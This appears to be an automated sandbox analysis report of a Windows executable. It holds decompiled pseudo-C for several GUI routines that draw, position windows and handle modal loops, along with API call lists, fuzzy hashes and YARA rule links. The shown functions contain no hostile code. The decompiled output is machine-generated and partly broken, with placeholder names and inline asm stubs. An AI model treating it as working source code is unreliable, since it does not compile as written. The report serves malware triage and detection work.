						E0041F7B8( *((intOrPtr*)(E004246E8( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E00412AB0(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E004246E8( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E0041FE50(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E00420244(E004246E8( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E00445D84(_t118));
						L004268FC();
						E00412AB0(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E00420244(E004246E8( *((intOrPtr*)(_t118 + 0x54))));
						E0041F7B8( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000014, _t135, _t139, __eflags);
						_t136 = E00420244(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L00406A38();
						E0041F7B8( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000010, _t135, _t139, _t85);
						_t137 = E00420244(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L00406A38();
						return _t96;
					}
					_push(_a8);
					_push(E004459AC(_t142));
					E004463C0(_t118, _t142);
					_push(E004459AC(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E00420244(__ecx));
					_push(_v8);
					_t117 = E00445D84(_t118);
					_push(_t117);
					L004268FC();
					return _t117;
				}
				return _t46;
			}

0x004463e8
0x004463f1
0x004463f3
0x004463f6
0x004463fa
0x00446401
0x00446407
0x0044640b
0x00446451
0x00446455
0x00446463
0x00446465
0x0044646c
0x00446478
0x00446480
0x00446482
0x00446482
0x00446495
0x004464a9
0x004464b1
0x004464b5
0x004464ba
0x004464bb
0x004464c0
0x004464c2
0x004464c4
0x004464c6
0x004464c8
0x004464ca
0x004464cc
0x004464db
0x004464df
0x004464e7
0x004464e8
0x00446504
0x00446516
0x00446521
0x0044652d
0x00446535
0x0044653d
0x00446542
0x00446547
0x00446549
0x0044654e
0x00446552
0x00446556
0x0044655b
0x0044655f
0x0044655f
0x00446560
0x00446561
0x00446562
0x0044656f
0x0044657b
0x00446583
0x0044658b
0x00446590
0x00446595
0x00446597
0x0044659c
0x004465a0
0x004465a4
0x004465a8
0x004465a9
0x004465ac
0x004465ad
0x004465ae
0x00000000
0x004465ae
0x00446410
0x00446419
0x0044641c
0x00446426
0x00446427
0x00446429
0x0044642e
0x00446432
0x0044643a
0x0044643e
0x00446441
0x00446446
0x00446447
0x00000000
0x00446447
0x004465b9

APIs

73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00446447
73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004464E8
SetTextColor.GDI32(00000000,00FFFFFF), ref: 00446535
SetBkColor.GDI32(00000000,00000000), ref: 0044653D
72E897E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 00446562

Part of subcall function 004463C0: 73452240.COMCTL32(00000000,?,00446421,00000000,?), ref: 004463D6

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 73452430Color$73452240E897Text
String ID:
API String ID: 3108427945-0
Opcode ID: c2d5027f094cb3e8d26aa8ac44fefcffed8f9225fead30ecd763925d9736c54d
Instruction ID: 135a1c8aabd01cd36ad84b90f085cf3848f72cfafbfede34c91a6043d44a1804
Opcode Fuzzy Hash: c2d5027f094cb3e8d26aa8ac44fefcffed8f9225fead30ecd763925d9736c54d
Instruction Fuzzy Hash: 93512C71301114AFDB40EF6DDD82F9E37ECAF49314F50016ABA04EB286CA78ED558B69

Uniqueness

Uniqueness Score: -1.00%

Function 0042F440, Relevance: 12.1, APIs: 8, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042F440(void* __eax, void* __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				struct HDWP__* _v28;
				int _v32;
				char _v36;
				struct tagTEXTMETRICA _v92;
				void* __ebx;
				void* __ebp;
				struct HDC__* _t85;
				void* _t88;
				void* _t111;
				char _t115;
				intOrPtr* _t117;
				void* _t142;
				signed int _t145;
				long _t146;
				signed int _t156;
				intOrPtr _t158;
				struct HDC__* _t173;
				int _t174;
				void* _t177;
				void* _t179;
				intOrPtr _t180;
				intOrPtr _t186;

				_t177 = _t179;
				_t180 = _t179 + 0xffffffa8;
				_t142 = __eax;
				_t85 =  *(__eax + 0x210);
				if( *((intOrPtr*)(_t85 + 8)) == 0 ||  *((char*)(__eax + 0x220)) != 0) {
					return _t85;
				} else {
					_push(0);
					L00406E30();
					_t173 = _t85;
					_t88 = SelectObject(_t173, E0041EFE0( *((intOrPtr*)(__eax + 0x68)), __eax, __ecx));
					GetTextMetricsA(_t173,  &_v92);
					SelectObject(_t173, _t88);
					_push(_t173);
					_push(0);
					L00407090();
					_t174 =  *( *((intOrPtr*)(_t142 + 0x210)) + 8);
					_t145 =  *(_t142 + 0x21c);
					asm("cdq");
					_v8 = (_t174 + _t145 - 1) / _t145;
					asm("cdq");
					_v12 = ( *((intOrPtr*)(_t142 + 0x48)) - 0xa) / _t145;
					_t146 = _v92.tmHeight;
					_v24 =  *((intOrPtr*)(_t142 + 0x4c)) - _t146 - 5;
					asm("cdq");
					_v16 = _v24 / _v8;
					asm("cdq");
					_t34 = _v24 % _v8;
					_t156 = _t34 >> 1;
					if(_t34 < 0) {
						asm("adc edx, 0x0");
					}
					_v20 = _t156 + _t146 + 1;
					_v28 = BeginDeferWindowPos(_t174);
					_push(_t177);
					_push(0x42f5c9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t180;
					_t111 =  *( *((intOrPtr*)(_t142 + 0x210)) + 8) - 1;
					if(_t111 >= 0) {
						_t115 = _t111 + 1;
						_t186 = _t115;
						_v36 = _t115;
						_v24 = 0;
						do {
							_t117 = E004140D0( *((intOrPtr*)(_t142 + 0x210)), _v24);
							_t170 = _t117;
							 *((intOrPtr*)( *_t117 + 0x70))();
							asm("cdq");
							_v32 = _v24 / _v8 * _v12 + 8;
							if(E004037B0(_t117, _t186) != 0) {
								_v32 = E004386C0(_t142) - _v32 - _v12;
							}
							asm("cdq");
							_v28 = DeferWindowPos(_v28, E0043F370(_t170), 0, _v32, _v24 % _v8 * _v16 + _v20, _v12, _v16, 0x14);
							E00438BDC(_t170, 1);
							_v24 = _v24 + 1;
							_t81 =  &_v36;
							 *_t81 = _v36 - 1;
						} while ( *_t81 != 0);
					}
					_pop(_t158);
					 *[fs:eax] = _t158;
					_push(0x42f5d0);
					return EndDeferWindowPos(_v28);
				}
			}

0x0042f441
0x0042f443
0x0042f449
0x0042f44b
0x0042f455
0x0042f5d6
0x0042f468
0x0042f468
0x0042f46a
0x0042f46f
0x0042f47b
0x0042f487
0x0042f48e
0x0042f493
0x0042f494
0x0042f496
0x0042f4a1
0x0042f4a6
0x0042f4af
0x0042f4b2
0x0042f4bb
0x0042f4be
0x0042f4c4
0x0042f4cc
0x0042f4d2
0x0042f4d6
0x0042f4dc
0x0042f4dd
0x0042f4e0
0x0042f4e2
0x0042f4e4
0x0042f4e4
0x0042f4ea
0x0042f4f3
0x0042f4f8
0x0042f4f9
0x0042f4fe
0x0042f501
0x0042f50d
0x0042f510
0x0042f516
0x0042f516
0x0042f517
0x0042f51a
0x0042f521
0x0042f52a
0x0042f52f
0x0042f538
0x0042f53e
0x0042f548
0x0042f558
0x0042f567
0x0042f567
0x0042f577
0x0042f59a
0x0042f5a1
0x0042f5a6
0x0042f5a9
0x0042f5a9
0x0042f5a9
0x0042f521
0x0042f5b4
0x0042f5b7
0x0042f5ba
0x0042f5c8
0x0042f5c8

APIs

72E7AC50.USER32(00000000), ref: 0042F46A

Part of subcall function 0041EFE0: CreateFontIndirectA.GDI32(?), ref: 0041F11E

SelectObject.GDI32(00000000,00000000), ref: 0042F47B
GetTextMetricsA.GDI32(00000000,?), ref: 0042F487
SelectObject.GDI32(00000000,00000000), ref: 0042F48E
72E7B380.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042F496
BeginDeferWindowPos.USER32 ref: 0042F4EE
DeferWindowPos.USER32(?,00000000,00000000,?,?,?,00000000,?), ref: 0042F595
EndDeferWindowPos.USER32(?,0042F5D0,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042F5C3

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$ObjectSelect$B380BeginCreateFontIndirectMetricsText
String ID:
API String ID: 2543476052-0
Opcode ID: fd70d8b1bc113fb1b0d3a05ff783645ca0dcda8fbd559670aff773bf8f467c29
Instruction ID: f231a79a3fc01ef62cb5b40cd116ab4036e1eef2a2934b6956d0ef2503f2129a
Opcode Fuzzy Hash: fd70d8b1bc113fb1b0d3a05ff783645ca0dcda8fbd559670aff773bf8f467c29
Instruction Fuzzy Hash: 56412F71A00119AFCB00DFA9C885BAEB7F5EF48304F54407AF904EB296D678AD458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004558D8, Relevance: 12.1, APIs: 8, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004558D8(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t88;
				intOrPtr _t120;
				void* _t122;
				void* _t125;
				void* _t126;
				intOrPtr _t127;

				_t123 = __esi;
				_t122 = __edi;
				_t125 = _t126;
				_t127 = _t126 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t125);
				_push(0x455b68);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				E0043751C();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2ec) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x48e640; // 0x41d0ec
					E00406520(_t50,  &_v36);
					E0040A0E8(_v36, 1);
					E00403D80();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000008;
				_v32 = GetActiveWindow();
				_t58 =  *0x471b1c; // 0x0
				_v20 = _t58;
				_t59 =  *0x48fc00; // 0x21d0f1c
				_t60 =  *0x48fc00; // 0x21d0f1c
				E0041414C( *((intOrPtr*)(_t60 + 0x7c)),  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t63 =  *0x48fc00; // 0x21d0f1c
				 *((intOrPtr*)(_t63 + 0x78)) = _v8;
				_t64 =  *0x48fc00; // 0x21d0f1c
				_v22 =  *((intOrPtr*)(_t64 + 0x44));
				_t66 =  *0x48fc00; // 0x21d0f1c
				E00456D40(_t66,  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t68 =  *0x48fc00; // 0x21d0f1c
				_v28 =  *((intOrPtr*)(_t68 + 0x48));
				_v16 = E0044FCEC(0, 0x48fbfc, _t122, _t123);
				_push(_t125);
				_push(0x455b48);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				E00455828(_v8);
				_push(_t125);
				_push(0x455aa7);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				SendMessageA(E0043F370(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					E00458A78( *0x48fbfc, _t122, _t123);
					if( *((char*)( *0x48fbfc + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E00455788(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t83 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t83 == 0);
				_v12 = _t83;
				SendMessageA(E0043F370(_v8), 0xb001, 0, 0);
				_t88 = E0043F370(_v8);
				if(_t88 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t120);
				 *[fs:eax] = _t120;
				_push(0x455aae);
				return E00455820();
			}

0x004558d8
0x004558d8
0x004558d9
0x004558db
0x004558de
0x004558df
0x004558e2
0x004558e5
0x004558ef
0x004558f0
0x004558f5
0x004558f8
0x004558fb
0x00455907
0x00455930
0x00455935
0x00455944
0x00455949
0x00455949
0x00455955
0x00455963
0x00455963
0x00455968
0x00455970
0x0045597c
0x0045597f
0x00455984
0x00455987
0x0045598f
0x00455999
0x0045599e
0x004559a6
0x004559a9
0x004559b2
0x004559b8
0x004559bd
0x004559c2
0x004559ca
0x004559d4
0x004559d9
0x004559da
0x004559df
0x004559e2
0x004559e8
0x004559ef
0x004559f0
0x004559f5
0x004559f8
0x00455a0d
0x00455a17
0x00455a1d
0x00455a1f
0x00455a2d
0x00455a48
0x00455a4d
0x00455a4d
0x00455a2f
0x00455a32
0x00455a32
0x00455a55
0x00455a5b
0x00455a5f
0x00455a74
0x00455a7c
0x00455a8a
0x00455a8e
0x00455a8e
0x00455a93
0x00455a96
0x00455a99
0x00455aa6

APIs

GetCapture.USER32 ref: 0045594E
GetCapture.USER32 ref: 0045595D
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00455963
ReleaseCapture.USER32(00000000,00455B68), ref: 00455968
GetActiveWindow.USER32 ref: 00455977
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00455A0D
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00455A74
GetActiveWindow.USER32 ref: 00455A83

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: af3af10c2a85beef7c96ebaf71d34b003db7c94f2303769abb78117ca06306e4
Instruction ID: 0303079256727d97a5b712c5d30198ceb27855357d6469653e8bce90c178d795
Opcode Fuzzy Hash: af3af10c2a85beef7c96ebaf71d34b003db7c94f2303769abb78117ca06306e4
Instruction Fuzzy Hash: 0E511F70A00604DFD710EF69C895BAD77F5FF49304F1544BAE804AB2A2D738AD49DB09

Uniqueness

Uniqueness Score: -1.00%

Function 0043D44C, Relevance: 12.1, APIs: 8, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043D44C(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E004375F8(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E0043F370(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E0043F370(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E004375F8(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E00439EA4(_t82, _t99, 0x14, 0);
				E00439EA4(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E004140D0( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E0043D44C(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}

0x0043d457
0x0043d459
0x0043d45b
0x0043d467
0x0043d471
0x0043d483
0x0043d488
0x0043d48c
0x0043d4a1
0x0043d4bb
0x0043d4c0
0x0043d4c5
0x0043d4c7
0x0043d4ce
0x0043d4ce
0x0043d4a3
0x0043d4a3
0x0043d4aa
0x0043d4aa
0x0043d4d5
0x0043d4e7
0x0043d4f6
0x0043d503
0x0043d51b
0x0043d51b
0x0043d52b
0x0043d53b
0x0043d540
0x0043d548
0x0043d587
0x0043d58c
0x0043d591
0x0043d59d
0x0043d54a
0x0043d54d
0x0043d550
0x00000000
0x00000000
0x0043d553
0x0043d556
0x0043d55d
0x0043d566
0x0043d56b
0x0043d56f
0x0043d57a
0x0043d57a
0x0043d57f
0x0043d582
0x0043d582
0x0043d582
0x00000000
0x0043d55d

APIs

SaveDC.GDI32 ref: 0043D462

Part of subcall function 004375F8: GetWindowOrgEx.GDI32(?), ref: 00437606
Part of subcall function 004375F8: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0043761C

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043D483
GetWindowLongA.USER32 ref: 0043D499
GetWindowLongA.USER32 ref: 0043D4BB
SetRect.USER32 ref: 0043D4E7
DrawEdge.USER32(?,?,?,00000000), ref: 0043D4F6
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043D51B
RestoreDC.GDI32(?,?), ref: 0043D58C

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
String ID:
API String ID: 2976466617-0
Opcode ID: 3b574ab7a52829840e4cd3b1f15a3d061a7059c29f6c65f29678ab16ad4aac27
Instruction ID: d32336d68219eb1ec227aa2ba040feeea10fbb9f3596117a72abf0e85f1a3c6b
Opcode Fuzzy Hash: 3b574ab7a52829840e4cd3b1f15a3d061a7059c29f6c65f29678ab16ad4aac27
Instruction Fuzzy Hash: 5B418271B00214ABDB00EAA9CC81F9F73B8AF48304F10406AF915EB3D2D67CED0587A8

Uniqueness

Uniqueness Score: -1.00%

Function 004602B4, Relevance: 12.1, APIs: 8, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004602B4(void* __eax, void* __edx) {
				char _v12;
				int _v24;
				int _v28;
				signed int _v48;
				signed int _v52;
				int _t53;
				int _t55;
				signed int _t60;
				signed int _t63;
				int _t82;
				int _t84;
				signed int _t89;
				signed int _t92;
				void* _t97;
				void* _t111;

				_t97 = __eax;
				if(__edx == 0) {
					E00412A88(0, _t111, 0);
					E00412A88(1,  &_v12, 1);
					SetMapMode(E00420244( *((intOrPtr*)(_t97 + 0x208))), 8);
					SetWindowOrgEx(E00420244( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
					_t53 = E00438704(_t97);
					_t55 = E004386C0(_t97);
					SetViewportExtEx(E00420244( *((intOrPtr*)(_t97 + 0x208))), _t55, _t53, 0);
					_t60 = E00438704(_t97);
					_t63 = E004386C0(_t97);
					return SetWindowExtEx(E00420244( *((intOrPtr*)(_t97 + 0x208))), _t63 * _v52, _t60 * _v48, 0);
				}
				E00412A88(E00412A88(E004386C0(__eax), _t111, 0) | 0xffffffff,  &_v12, 1);
				SetMapMode(E00420244( *((intOrPtr*)(_t97 + 0x208))), 8);
				SetWindowOrgEx(E00420244( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
				_t82 = E00438704(_t97);
				_t84 = E004386C0(_t97);
				SetViewportExtEx(E00420244( *((intOrPtr*)(_t97 + 0x208))), _t84, _t82, 0);
				_t89 = E00438704(_t97);
				_t92 = E004386C0(_t97);
				return SetWindowExtEx(E00420244( *((intOrPtr*)(_t97 + 0x208))), _t92 * _v52, _t89 * _v48, 0);
			}

0x004602b8
0x004602bc
0x0046036c
0x0046037f
0x00460392
0x004603af
0x004603b8
0x004603c0
0x004603d2
0x004603db
0x004603e7
0x00000000
0x004603fd
0x004602de
0x004602f1
0x0046030e
0x00460317
0x0046031f
0x00460331
0x0046033a
0x00460346
0x00000000

APIs

SetMapMode.GDI32(00000000,00000008), ref: 004602F1
SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0046030E
SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 00460331
SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0046035C
SetMapMode.GDI32(00000000,00000008), ref: 00460392
SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 004603AF
SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 004603D2
SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 004603FD

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ModeViewport
String ID:
API String ID: 3149394475-0
Opcode ID: 73698d7bde0de6fa8cd98994edfe652ec0af4056aaec0416285354e355b5b6de
Instruction ID: 689bb9299ad6ed34ff998fa525b3a6a811491218c4ec6300ff358f430385186f
Opcode Fuzzy Hash: 73698d7bde0de6fa8cd98994edfe652ec0af4056aaec0416285354e355b5b6de
Instruction Fuzzy Hash: 83310B707443016BD740FA7ACC8BB4B62989F48308F04597EB599EB2A3CE7DE8954729

Uniqueness

Uniqueness Score: -1.00%

Function 00420B7C, Relevance: 12.1, APIs: 8, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00420B7C(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E00402994(_t24, 0x40,  &_v1032);
				_push(0);
				L00406E30();
				_v8 = _t25;
				_push(_t54);
				_push(0x420c79);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L00406B00();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L00406B40();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L00406B40();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L00406B40();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L00406B40();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L00406B40();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E00420C80);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L00407090();
				return _t29;
			}

0x00420b7d
0x00420b86
0x00420b8f
0x00420ba3
0x00420ba8
0x00420baa
0x00420baf
0x00420bb4
0x00420bb5
0x00420bba
0x00420bbd
0x00420bc0
0x00420bc2
0x00420bc5
0x00420bc6
0x00420bcb
0x00420bd0
0x00420bdc
0x00420bdd
0x00420bdf
0x00420be4
0x00420be5
0x00420bf4
0x00420c50
0x00420c51
0x00420c56
0x00420c5a
0x00420c5b
0x00420bf6
0x00420bfc
0x00420bfd
0x00420c04
0x00420c08
0x00420c09
0x00420c1c
0x00420c1d
0x00420c22
0x00420c26
0x00420c27
0x00420c32
0x00420c33
0x00420c35
0x00420c3a
0x00420c3b
0x00420c3b
0x00420bf4
0x00420c62
0x00420c65
0x00420c68
0x00420c6d
0x00420c70
0x00420c71
0x00420c73
0x00420c78

APIs

72E7AC50.USER32(00000000), ref: 00420BAA
72E7AD70.GDI32(?,00000068,00000000,00420C79,?,00000000), ref: 00420BC6
72E7AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,00420C79,?,00000000), ref: 00420BE5
72E7AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00420C79,?,00000000), ref: 00420C09
72E7AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00420C79), ref: 00420C27
72E7AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 00420C3B
72E7AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,00420C79,?,00000000), ref: 00420C5B
72E7B380.USER32(00000000,?,00420C80,00420C79,?,00000000), ref: 00420C73

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
